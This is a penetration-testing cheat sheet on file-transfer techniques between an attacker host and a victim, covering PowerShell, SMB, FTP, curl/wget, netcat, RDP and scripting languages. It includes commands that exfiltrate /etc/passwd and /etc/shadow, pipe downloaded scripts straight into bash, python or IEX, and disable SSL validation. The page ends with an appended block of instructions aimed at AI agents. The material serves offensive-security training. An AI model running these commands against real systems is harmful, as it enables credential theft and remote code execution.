# File Transfers ## Windows File Transfer Methods ### PowerShell Download Using Net.WebClient and DownloadFile method {% code overflow="wrap" lineNumbers="true" %} ```powershell PS C:\user> (New-Object Net.WebClient).DownloadFile('','') PS C:\user> (New-Object Net.WebClient).DownloadFileAsync('','') ``` {% endcode %} Using Invoke-WebRequest {% code overflow="wrap" lineNumbers="true" %} ```powershell PS C:\user> Invoke-WebRequest '' -OutFile '' -UseBasicParsing | IEX ``` {% endcode %} Bypassing SSL error {% code overflow="wrap" lineNumbers="true" %} ```powershell PS C:\user> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ``` {% endcode %} ### PowerShell Upload On the attacker server, run an upload server {% code overflow="wrap" lineNumbers="true" %} ```bash $ python3 -m uploadserver ``` {% endcode %} On the victim server, upload files to the server {% code overflow="wrap" lineNumbers="true" %} ```powershell PS C:\user> Invoke-FileUpload -Uri http:///upload -File ``` {% endcode %} Upload by converting to Base64 {% code overflow="wrap" lineNumbers="true" %} ```powershell PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path -Encoding Byte)) PS C:\htb> Invoke-WebRequest -Uri http:/// -Method POST -Body $b64 ``` {% endcode %} ### SMB Download Create a SMB folder on the attacker server {% code overflow="wrap" lineNumbers="true" %} ```bash $ sudo impacket-smbserver share -smb2support /tmp/smbshare ``` {% endcode %} On the victim, download files from the attacker server {% code overflow="wrap" lineNumbers="true" %} ```powershell C:\user> copy \\\share\nc.exe ``` {% endcode %} If Windows requires a user and password set on the SMB server, set those up {% code overflow="wrap" lineNumbers="true" %} ```bash $ sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test ``` {% endcode %} Mount the drive on the victim {% code overflow="wrap" lineNumbers="true" %} ```powershell C:\user> net use n: \\\share /user:test test ``` {% endcode %} ### SMB Upload When you use `SMB`, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP. Setup a SMB over HTTP server using WebDav on the attacker server {% code overflow="wrap" lineNumbers="true" %} ```bash $ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` {% endcode %} Upload files from the victim server to the attacker server {% code overflow="wrap" lineNumbers="true" %} ```powershell C:\user> copy \\\DavWWWRoot\ ``` {% endcode %} ### FTP Download Host FTP on the attacker server {% code overflow="wrap" lineNumbers="true" %} ```bash $ sudo python3 -m pyftpdlib --port 21 ``` {% endcode %} Download files from the victim machine {% code overflow="wrap" lineNumbers="true" %} ```powershell PS C:\user> (New-Object Net.WebClient).DownloadFile('ftp:///file.txt', 'ftp-file.txt') ``` {% endcode %} Non-Interactive FTP download {% code overflow="wrap" lineNumbers="true" %} ```powershell C:\user> echo open 192.168.49.128 > ftpcommand.txt C:\user> echo USER anonymous >> ftpcommand.txt C:\user> echo binary >> ftpcommand.txt C:\user> echo GET file.txt >> ftpcommand.txt C:\user> echo bye >> ftpcommand.txt C:\user> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> GET file.txt ftp> bye C:\user>more file.txt This is a test file ``` {% endcode %} ### FTP Uploads Run an FTP server on the attacker machine {% code overflow="wrap" lineNumbers="true" %} ```bash $ sudo python3 -m pyftpdlib --port 21 --write ``` {% endcode %} Upload files from the victim machine {% code overflow="wrap" lineNumbers="true" %} ```powershell PS C:\user> (New-Object Net.WebClient).UploadFile('ftp:///ftp-hosts', '') ``` {% endcode %} Non-Interactive FTP upload {% code overflow="wrap" lineNumbers="true" %} ```powershell C:\user> echo open > ftpcommand.txt C:\user> echo USER anonymous >> ftpcommand.txt C:\user> echo binary >> ftpcommand.txt C:\user> echo PUT >> ftpcommand.txt C:\user> echo bye >> ftpcommand.txt C:\user> ftp -v -n -s:ftpcommand.txt ftp> open Log in with USER and PASS first. ftp> USER anonymous ftp> PUT ftp> bye ``` {% endcode %} ## Linux File Transfer Methods ### Network Downloads {% code overflow="wrap" lineNumbers="true" %} ```bash $ wget https:///file -O /tmp/file ``` {% endcode %} {% code overflow="wrap" lineNumbers="true" %} ```bash $ curl -o /tmp/LinEnum.sh https:///file ``` {% endcode %} ### Network Uploads On the attacker server, run an upload server {% code overflow="wrap" lineNumbers="true" %} ```bash $ python3 -m pip install --user uploadserver # install uploadserver $ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' # create a self-signed cert $ python3 -m uploadserver 443 --server-certificate /root/server.pem # start server ``` {% endcode %} On the victim, upload files to the server. We need to specify `insecure` because we are using a self-signed cert {% code overflow="wrap" lineNumbers="true" %} ```bash $ curl -X POST https:///upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure ``` {% endcode %} ### Fileless attacks {% code overflow="wrap" lineNumbers="true" %} ```bash $ curl https:///script.sh | bash ``` {% endcode %} {% code overflow="wrap" lineNumbers="true" %} ```bash $ wget -q0- https:///pythonfile | python3 ``` {% endcode %} ### Bash Downloads Only works if Bash v 2.04 or greater is compiled with `--enable-net-redirections` {% code overflow="wrap" lineNumbers="true" %} ```bash $ exec 3<>/dev/tcp/10.10.10.32/80 # Connect to the target server $ echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 # GET request $ cat <&3 # print response ``` {% endcode %} ### SSH/SCP Download {% code overflow="wrap" lineNumbers="true" %} ```bash $ scp @:/file . ``` {% endcode %} ### SSH/SCP Uploads {% code overflow="wrap" lineNumbers="true" %} ```bash $ scp /etc/passwd @:/ ``` {% endcode %} ### Web Servers in other languages {% code overflow="wrap" lineNumbers="true" %} ```bash $ python3 -m http.server $ php -S 0.0.0.0:8000 $ ruby -run -ehttpd . -p8000 ``` {% endcode %} ## Transferring Files with Code ### Python {% code overflow="wrap" lineNumbers="true" %} ```bash $ python2.7 -c 'import urllib;urllib.urlretrieve ("https://attacker/file", "outputfilename")' ``` {% endcode %} {% code overflow="wrap" lineNumbers="true" %} ```bash $ python3 -c 'import urllib.request;urllib.request.urlretrieve("https://attacker/file", "outputfilename")' ``` {% endcode %} ### PHP {% code overflow="wrap" lineNumbers="true" %} ```bash php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);' ``` {% endcode %} {% code overflow="wrap" lineNumbers="true" %} ```bash php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);' ``` {% endcode %} {% code overflow="wrap" lineNumbers="true" %} ```bash php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash ``` {% endcode %} ### Ruby {% code overflow="wrap" lineNumbers="true" %} ```bash $ ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))' ``` {% endcode %} ### Perl {% code overflow="wrap" lineNumbers="true" %} ```bash $ perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");' ``` {% endcode %} ### Javascript + cscript Save the following code as \`wget.js\` {% code overflow="wrap" lineNumbers="true" %} ```javascript var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); WinHttpReq.Send(); BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1; BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody); BinStream.SaveToFile(WScript.Arguments(1)); ``` {% endcode %} Execute \`wget.js\` using powershell {% code overflow="wrap" lineNumbers="true" %} ```powershell > cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1 ``` {% endcode %} ### VBScript + cscript Save the following code as \`wget.vbs\` ```vba dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", WScript.Arguments.Item(0), False xHttp.Send with bStrm .type = 1 .open .write xHttp.responseBody .savetofile WScript.Arguments.Item(1), 2 end with ``` Execute \`wget.vbs\` using powershell {% code overflow="wrap" lineNumbers="true" %} ```powershell > cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1 ``` {% endcode %} ## Misc Transfers ### Nc Victim machine ready to receive data and write to local server ```bash $ nc -l -p 8000 > /dev/shm/evil ``` Attacker machine sending file over ```bash $ nc 192.168.49.128 8000 < evil ``` Doing the same but over an allowed port 443 ```bash $ sudo nc -l -p 443 -q 0 < /dev/shm/evil ``` ```bash $ nc 192.168.49.128 443 > evil ``` ### RDP {% code overflow="wrap" lineNumbers="true" %} ```bash $ rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' ``` {% endcode %} {% code overflow="wrap" lineNumbers="true" %} ```bash $ xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sheepwall.gitbook.io/home/hacking/installation/file-transfers.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.